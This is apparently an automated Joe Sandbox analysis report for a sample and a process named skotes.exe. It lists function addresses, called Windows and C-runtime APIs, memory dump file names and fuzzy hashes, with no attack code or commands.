__Mtx_unlock.LIBCPMT ref: 00D72F5F
__Mtx_unlock.LIBCPMT ref: 00D72FCC
__Cnd_broadcast.LIBCPMT ref: 00D72FE3
__Mtx_unlock.LIBCPMT ref: 00D730F5
__Mtx_unlock.LIBCPMT ref: 00D7319B

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: a2a08a14d706abfa30ea33e65f87ec4d0648fbeb2d65e64165d839a0d1bc012f
Instruction ID: c5ab9572aa1f3a4d8e51caccad62d984ec802f32987ed72e27ce30b926d1fadf
Opcode Fuzzy Hash: a2a08a14d706abfa30ea33e65f87ec4d0648fbeb2d65e64165d839a0d1bc012f
Instruction Fuzzy Hash: 78A1D3B1A01305DFDB10EF65C945B6AB7A8FF15320F088169E819D7291FB31EA04DBB1

Function 00DACBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00DACC66

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: d9ffa9e8c8764c9e899932f4da803f735894ccf588c40cef224680b044330453
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: 9BB12632D252459FDF15CF28C8817EEBBE5EF46360F18916AE855EB241D6348E41CBB0

Function 00D8BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00D8BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00D8BBE4
_xtime_get.LIBCPMT ref: 00D8BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00D8BC13

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a0b1d527779d693a7d9311dd6d92105a347e66e6a3ef1f9beb4806d926f770cd
Instruction ID: 809b5e5c7b5fb5bb1ba111281ddec3a2df780f5802147a6bc60d7e43d2412c21
Opcode Fuzzy Hash: a0b1d527779d693a7d9311dd6d92105a347e66e6a3ef1f9beb4806d926f770cd
Instruction Fuzzy Hash: 2421ED75A11219EFDF00EBA4D8869BEBBB9EF48710F105066F601A7261DB349D019BB1

Analysis Process: skotes.exePID: 6172, Parent PID: 7164COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1881
Total number of Limit Nodes:	15

Executed Functions

Function 00FE652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6567

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 77fb23d2c0e1ebf97732e83d64dbb0a446a49238d1a1f524eb324026670bfcee
Instruction ID: 6e2ff6a8f9b9e13d23ac4cc3eb605b3fe7ee15d21e1e5b968283df3509fb5e8c
Opcode Fuzzy Hash: 77fb23d2c0e1ebf97732e83d64dbb0a446a49238d1a1f524eb324026670bfcee
Instruction Fuzzy Hash: 58E0863050128C6ECE257B15DD4994C7B19EBA1795F040800FD0DD6122CB25ED81E580

Function 00FB9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
